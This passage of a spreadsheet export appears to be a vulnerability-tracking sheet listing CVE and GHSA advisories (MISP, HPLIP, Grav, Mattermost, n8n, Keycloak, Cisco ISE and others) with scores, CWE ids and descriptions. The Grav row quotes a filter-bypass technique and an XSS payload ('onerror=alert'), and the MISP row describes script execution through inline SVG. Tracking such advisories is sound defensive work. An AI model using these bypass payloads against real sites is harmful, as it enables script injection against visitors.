          <t>Affected versions of MISP serve uploaded SVG images inline without a restrictive browser sandbox.
The commit explains that SVG files are XML documents rather than passive bitmap images. While scripts inside SVG do not execute when the SVG is rendered through a normal &lt;img&gt;, they can execute when the SVG is navigated to directly or embedded as a document. In that case, malicious &lt;script&gt; elements, event handlers, or javascript: URLs execute on the MISP origin with the viewer’s session.
The affected use cases include:
 - organisation SVG logos;
 - event-report SVG pictures.
Importantly, the vulnerable behavior is on the serve path, not merely the upload path: the patch notes that a malicious SVG uploaded while SVG support was enabled could remain dangerous even after uploads were later disabled.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90957</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91099</t>
        </is>
      </c>
      <c r="D1251" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1251" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1251" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G1251" s="5" t="inlineStr"/>
      <c r="H1251" s="5" t="inlineStr"/>
      <c r="I1251" s="5" t="inlineStr"/>
      <c r="J1251" s="5" t="inlineStr"/>
      <c r="K1251" s="5" t="inlineStr"/>
      <c r="L1251" s="5" t="inlineStr"/>
      <c r="M1251" s="5" t="inlineStr"/>
      <c r="N1251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1251" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1251" s="5" t="inlineStr"/>
      <c r="Q1251" s="5" t="inlineStr">
        <is>
          <t>CWE-61</t>
        </is>
      </c>
      <c r="R1251" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91099</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91101</t>
        </is>
      </c>
      <c r="D1252" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1252" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1252" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G1252" s="5" t="inlineStr"/>
      <c r="H1252" s="5" t="inlineStr"/>
      <c r="I1252" s="5" t="inlineStr"/>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr"/>
      <c r="L1252" s="5" t="inlineStr"/>
      <c r="M1252" s="5" t="inlineStr"/>
      <c r="N1252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1252" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1252" s="5" t="inlineStr"/>
      <c r="Q1252" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R1252" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91101</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91103</t>
        </is>
      </c>
      <c r="D1253" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1253" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1253" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G1253" s="5" t="inlineStr"/>
      <c r="H1253" s="5" t="inlineStr"/>
      <c r="I1253" s="5" t="inlineStr"/>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr"/>
      <c r="L1253" s="5" t="inlineStr"/>
      <c r="M1253" s="5" t="inlineStr"/>
      <c r="N1253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1253" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1253" s="5" t="inlineStr"/>
      <c r="Q1253" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R1253" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91103</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92213</t>
        </is>
      </c>
      <c r="D1254" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1254" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1254" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1254" s="5" t="inlineStr"/>
      <c r="H1254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1254" s="5" t="inlineStr"/>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr"/>
      <c r="L1254" s="5" t="inlineStr"/>
      <c r="M1254" s="5" t="inlineStr"/>
      <c r="N1254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1254" s="5" t="inlineStr"/>
      <c r="Q1254" s="5" t="inlineStr">
        <is>
          <t>CWE-707, CWE-74</t>
        </is>
      </c>
      <c r="R1254" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in a2ui-project a2ui up to 0.10.6. This impacts the function z.any of the file renderers/web_core/src/v0_9/schema/server-to-client.ts of the component Angular Renderer. Performing a manipulation of the argument primaryColor results in injection. The attack is possible to be carried out remotely. The patch is named fb8e85aec78d04e81feb9992a57638ca1ec4dc1b. It is suggested to install a patch to address this issue.</t>
        </is>
      </c>
      <c r="S1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92213</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1255" s="5" t="inlineStr">
        <is>
          <t>GHSA-373m-p57p-8665</t>
        </is>
      </c>
      <c r="D1255" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E1255" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1255" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1255" s="5" t="inlineStr"/>
      <c r="H1255" s="5" t="inlineStr"/>
      <c r="I1255" s="5" t="inlineStr"/>
      <c r="J1255" s="5" t="inlineStr"/>
      <c r="K1255" s="5" t="inlineStr"/>
      <c r="L1255" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M1255" s="5" t="inlineStr"/>
      <c r="N1255" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1255" s="5" t="inlineStr"/>
      <c r="P1255" s="5" t="inlineStr"/>
      <c r="Q1255" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1255" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-2c4f-86xc-cr74. This link is maintained to preserve external references.
### Original Description
Grav v2.0.0 contains a cross-site scripting vulnerability (fixed in 2.0.1). The XSS blueprint validator (Security::detectXss()) runs on raw page content before Twig processing. When Twig content processing is enabled (twig_content.process_enabled: true), an attacker with page-write API permission can use Twig's string concatenation operator (~) to dynamically construct event handler names, dangerous tag names, or dangerous protocols at render time (e.g. {% set x = "on" ~ "error" %}). The validator sees only the harmless Twig expression and allows the content, but after Twig rendering the output (rendered via {{ page.content|raw }}) contains an active payload such as &lt;img src=1 onerror=alert(1)&gt;, executing arbitrary JavaScript in visitors' browsers.</t>
        </is>
      </c>
      <c r="S1255" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-373m-p57p-8665</t>
        </is>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1256" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10542</t>
        </is>
      </c>
      <c r="D1256" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1256" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1256" s="5" t="inlineStr">
        <is>
          <t>responsibledisclosure@mattermost.com</t>
        </is>
      </c>
      <c r="G1256" s="5" t="inlineStr"/>
      <c r="H1256" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1256" s="5" t="inlineStr"/>
      <c r="J1256" s="5" t="inlineStr"/>
      <c r="K1256" s="5" t="inlineStr"/>
      <c r="L1256" s="5" t="inlineStr"/>
      <c r="M1256" s="5" t="inlineStr"/>
      <c r="N1256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1256" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1256" s="5" t="inlineStr"/>
      <c r="Q1256" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1256" s="5" t="inlineStr">
        <is>
          <t>Mattermost versions 11.9.x &lt;= 11.9.0, 11.8.x &lt;= 11.8.4, 11.7.x &lt;= 11.7.7, 10.11.x &lt;= 10.11.22 fail to validate channel action ownership which allows channel managers to update actions in other channels via the channel action update endpoint.. Mattermost Advisory ID: MMSA-2026-00692</t>
        </is>
      </c>
      <c r="S1256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10542</t>
        </is>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1257" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55244</t>
        </is>
      </c>
      <c r="D1257" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1257" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1257" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1257" s="5" t="inlineStr"/>
      <c r="H1257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1257" s="5" t="inlineStr"/>
      <c r="J1257" s="5" t="inlineStr"/>
      <c r="K1257" s="5" t="inlineStr"/>
      <c r="L1257" s="5" t="inlineStr"/>
      <c r="M1257" s="5" t="inlineStr"/>
      <c r="N1257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1257" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P1257" s="5" t="inlineStr"/>
      <c r="Q1257" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R1257" s="5" t="inlineStr">
        <is>
          <t>ASTEVAL is an evaluator of Python expressions and statements. Prior to 1.0.9, FROM_PY in asteval/astutils.py exposes BaseException, SystemExit, KeyboardInterrupt, and GeneratorExit to expressions evaluated by asteval.Interpreter.eval(), while run() and eval() in asteval/asteval.py catch Exception rather than these non-Exception BaseException subclasses. When an attacker-controlled expression raises one of these classes, on_raise() passes the class to raise_exception(), and the resulting exception bypasses the interpreter's safety handlers and propagates into the calling application. A consuming service that evaluates untrusted expressions can therefore be terminated or have signal and cleanup handling disrupted, causing denial of service. The separately documented read-only open() capability is not part of this vulnerability. This issue is fixed in version 1.0.9.</t>
        </is>
      </c>
      <c r="S1257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55244</t>
        </is>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1258" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61910</t>
        </is>
      </c>
      <c r="D1258" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1258" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1258" s="5" t="inlineStr"/>
      <c r="H1258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1258" s="5" t="inlineStr"/>
      <c r="J1258" s="5" t="inlineStr"/>
      <c r="K1258" s="5" t="inlineStr">
        <is>
          <t>cyrus:imap</t>
        </is>
      </c>
      <c r="L1258" s="5" t="inlineStr"/>
      <c r="M1258" s="5" t="inlineStr"/>
      <c r="N1258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1258" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1258" s="5" t="inlineStr"/>
      <c r="Q1258" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1258" s="5" t="inlineStr">
        <is>
          <t>An issue was discovered in Cyrus IMAP before 3.12.4. Mailbox/set let a sharee change a special-use role on shared mailboxes. An authenticated user with maySetKeywords on another user's mailbox could change that mailbox's specialuse annotation. This could allow the sharee to change the shared mailbox to perform the archived, snoozed, or other role, which might cause mail mail to be written to the shared mailbox, sharing more content than intended. (This is likely to be an unusual situation, made more unusual because if the target already has an non-shared mailbox with that role, role duplication suppression will prevent the update.)</t>
        </is>
      </c>
      <c r="S1258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61910</t>
        </is>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1259" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79723</t>
        </is>
      </c>
      <c r="D1259" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1259" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1259" s="5" t="inlineStr">
        <is>
          <t>psirt@us.ibm.com</t>
        </is>
      </c>
      <c r="G1259" s="5" t="inlineStr"/>
      <c r="H1259" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1259" s="5" t="inlineStr"/>
      <c r="J1259" s="5" t="inlineStr"/>
      <c r="K1259" s="5" t="inlineStr">
        <is>
          <t>langflow:langflow</t>
        </is>
      </c>
      <c r="L1259" s="5" t="inlineStr"/>
      <c r="M1259" s="5" t="inlineStr"/>
      <c r="N1259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1259" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1259" s="5" t="inlineStr"/>
      <c r="Q1259" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1259" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.5 could allow a remote authenticated attacker to obtain sensitive information due to improper validation of user-controlled API endpoints.</t>
        </is>
      </c>
      <c r="S1259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79723</t>
        </is>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1260" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80434</t>
        </is>
      </c>
      <c r="D1260" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1260" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1260" s="5" t="inlineStr"/>
      <c r="H1260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1260" s="5" t="inlineStr"/>
      <c r="J1260" s="5" t="inlineStr"/>
      <c r="K1260" s="5" t="inlineStr">
        <is>
          <t>ibm:datastage_on_cloud_pak_for_data</t>
        </is>
      </c>
      <c r="L1260" s="5" t="inlineStr"/>
      <c r="M1260" s="5" t="inlineStr"/>
      <c r="N1260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1260" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P1260" s="5" t="inlineStr"/>
      <c r="Q1260" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1260" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote authenticated attacker to manipulate runtime caches and cause a denial of service due to an insecure direct object reference.</t>
        </is>
      </c>
      <c r="S1260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80434</t>
        </is>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92587</t>
        </is>
      </c>
      <c r="D1261" s="5" t="n">
        <v>5</v>
      </c>
      <c r="E1261" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1261" s="5" t="inlineStr"/>
      <c r="H1261" s="5" t="inlineStr"/>
      <c r="I1261" s="5" t="inlineStr"/>
      <c r="J1261" s="5" t="inlineStr"/>
      <c r="K1261" s="5" t="inlineStr"/>
      <c r="L1261" s="5" t="inlineStr"/>
      <c r="M1261" s="5" t="inlineStr"/>
      <c r="N1261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1261" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1261" s="5" t="inlineStr"/>
      <c r="Q1261" s="5" t="inlineStr">
        <is>
          <t>CWE-426</t>
        </is>
      </c>
      <c r="R1261" s="5" t="inlineStr">
        <is>
          <t>n8n is a workflow automation platform. In versions before 1.123.76, 2.37.7, and 2.38.2, the Git node validated a relative remote URL against the configured repositoryPath but then invoked git with that path as its working directory; git walked up to the enclosing repository's top level and resolved the same relative URL from there. An authenticated user (member) who nested the repository one level below the configured path could therefore make an identical URL string pass the file-access check while git resolved it outside the sandbox. A subsequent fetch or pull read a git repository outside N8N_RESTRICT_FILE_ACCESS_TO and merged its objects into the user's own repository, where their contents could be read back. The issue is fixed in n8n 1.123.76, 2.37.7, and 2.38.2, which resolve the remote reference from the directory git actually operates in before applying the sandbox check. As a workaround, the Git node can be disabled by adding n8n-nodes-base.git to NODES_EXCLUDE.</t>
        </is>
      </c>
      <c r="S1261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92587</t>
        </is>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1262" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="D1262" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1262" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1262" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1262" s="5" t="inlineStr"/>
      <c r="H1262" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1262" s="5" t="inlineStr"/>
      <c r="J1262" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1262" s="5" t="inlineStr"/>
      <c r="L1262" s="5" t="inlineStr"/>
      <c r="M1262" s="5" t="inlineStr"/>
      <c r="N1262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1262" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1262" s="5" t="inlineStr"/>
      <c r="Q1262" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1262" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="S1262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="1263">
      <c r="A1263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20072</t>
        </is>
      </c>
      <c r="D1263" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1263" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1263" s="5" t="inlineStr"/>
      <c r="H1263" s="5" t="inlineStr"/>
      <c r="I1263" s="5" t="inlineStr"/>
      <c r="J1263" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1263" s="5" t="inlineStr"/>
      <c r="L1263" s="5" t="inlineStr"/>
      <c r="M1263" s="5" t="inlineStr"/>
      <c r="N1263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1263" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1263" s="5" t="inlineStr"/>
      <c r="Q1263" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1263" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the web-based management interface of Cisco ISE could allow an authenticated, remote attacker to obtain sensitive information from network users that are outside the security group that the attacker is assigned to. &amp;nbsp;
This vulnerability exists because certain files lack proper authorization enforcement. An attacker with administrative privileges and management rights over network users could exploit this vulnerability by exporting the&amp;nbsp;users. A successful exploit could allow the attacker to view passwords that are normally not visible to administrators.&amp;nbsp;</t>
        </is>
      </c>
      <c r="S1263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20072</t>
        </is>
      </c>
    </row>
    <row r="1264">
      <c r="A1264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20235</t>
        </is>
      </c>
      <c r="D1264" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1264" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1264" s="5" t="inlineStr"/>
      <c r="H1264" s="5" t="inlineStr"/>
      <c r="I1264" s="5" t="inlineStr"/>
      <c r="J1264" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1264" s="5" t="inlineStr"/>
      <c r="L1264" s="5" t="inlineStr"/>
      <c r="M1264" s="5" t="inlineStr"/>
      <c r="N1264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1264" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1264" s="5" t="inlineStr"/>
      <c r="Q1264" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1264" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the API of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to view sensitive information on an affected device. To exploit this vulnerability, the attacker must have valid administrative credentials.
This vulnerability is due to insufficient validation of user-supplied parameters in API requests. An attacker could exploit this vulnerability by sending a crafted API request to an affected device. A successful exploit could allow the attacker to gain access to sensitive information, including hashed credentials that could be used in future attacks.</t>
        </is>
      </c>
      <c r="S1264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20235</t>
        </is>
      </c>
    </row>
    <row r="1265">
      <c r="A1265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20282</t>
        </is>
      </c>
      <c r="D1265" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1265" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1265" s="5" t="inlineStr"/>
      <c r="H1265" s="5" t="inlineStr"/>
      <c r="I1265" s="5" t="inlineStr"/>
      <c r="J1265" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K1265" s="5" t="inlineStr"/>
      <c r="L1265" s="5" t="inlineStr"/>
      <c r="M1265" s="5" t="inlineStr"/>
      <c r="N1265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1265" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1265" s="5" t="inlineStr"/>
      <c r="Q1265" s="5" t="inlineStr">
        <is>
          <t>CWE-641</t>
        </is>
      </c>
      <c r="R1265" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in Cisco ISE could allow an authenticated, remote attacker to obtain write access on the underlying operating system of an affected device.
This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to obtain write access to the underlying operating system.
To exploit this vulnerability, the attacker must have valid administrative credentials.
Note: For CVE-2026-20282, Cisco has assigned a Security Impact Rating (SIR) of High rather than Medium as the score indicates. The reason is that it is easy to get to root from the achieved privilege level.</t>
        </is>
      </c>
      <c r="S1265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20282</t>
        </is>
      </c>
    </row>
    <row r="1266">
      <c r="A1266" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76426</t>
        </is>
      </c>
      <c r="D1266" s="5" t="n">
        <v>4.9</v>
      </c>
